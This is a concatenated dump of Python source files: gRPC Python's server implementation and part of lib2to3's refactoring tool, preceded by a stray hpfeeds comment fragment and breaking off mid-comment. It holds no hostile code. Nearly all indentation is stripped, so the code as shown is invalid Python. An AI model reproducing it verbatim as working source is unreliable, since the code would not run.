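# The hpfeeds-related options are only needed when alerts should also be
# published to an hpfeeds broker.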
|
_server.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple(
'_HandlerCallDetails', ('method', 'invocation_metadata',)),
grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
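# Bookkeeping note: every batch operation started against a call adds a token
# to state.due, and the operation's completion callback removes it through
# _possibly_finish_call below. Only once the RPC has terminated (client
# cancelled or status sent) *and* no operations remain in flight are the
# registered callbacks handed back to be invoked.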
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata), effective_code,
effective_details, _EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata), effective_code,
effective_details, _EMPTY_FLAGS),
)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request, request_deserializer)
with state.condition:
if request is None:
_abort(
state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
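# Note on the read path: a None serialized request means the client has
# finished sending (half-close), so the client state moves to closed; a
# request that fails to deserialize aborts the RPC with StatusCode.internal.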
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(self._rpc_event.request_call_details.deadline - time.time(), 0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations((cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call, self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
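# Returns a thunk that, when called, drains exactly one request message from the
# call: it starts a receive-message batch, waits on the RPC state condition, and
# aborts the RPC (UNIMPLEMENTED) if the client half-closes without sending one.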
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(
state, rpc_event.operation_call, request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(
state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented, _common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(
state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response, _EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (
cygrpc.operation_send_message(serialized_response, _EMPTY_FLAGS),
)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(
_EMPTY_METADATA, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(cygrpc.operation_send_message(
serialized_response, _EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(
rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
return
def _stream_response_in_pool(
rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state, serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(
rpc_event, state, method_handler.request_deserializer)
thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(
rpc_event, state, method_handler.request_deserializer)
thread_pool.submit(
_stream_response_in_pool, rpc_event, state, method_handler.unary_stream,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(
state, rpc_event.operation_call, method_handler.request_deserializer)
thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(
state, rpc_event.operation_call, method_handler.request_deserializer)
thread_pool.submit(
_stream_response_in_pool, rpc_event, state, method_handler.stream_stream,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.operation_call.start_server_batch(
operations, lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler, thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler, thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler, thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler, thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler, thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address, server_credentials._credentials)
def _request_call(state):
state.server.request_call(
state.completion_queue, state.completion_queue, _REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
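# Server event loop: polls the completion queue and dispatches each event by tag --
# the shutdown tag, the request-call tag (a new incoming RPC), or a per-RPC batch
# completion whose tag is the callback registered when that batch was started.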
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(
event, state.generic_handlers, state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server()
server.register_completion_queue(completion_queue)
self._state = _ServerState(
completion_queue, server, generic_handlers, thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatterns must either have no type and no content
        # or a type and content -- so they don't get any farther.
        # Always return leaves.
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
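# Scans the leading tokens of a source string (skipping an optional docstring) for
# "from __future__ import ..." statements and returns the imported feature names,
# e.g. frozenset({"print_function"}).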
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
            explicit: a list of fixers to run even if they are marked as explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
        # When this is True, the refactor*() methods will call write_file() even
        # for files that were not changed during refactoring, provided the
        # refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline='') as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
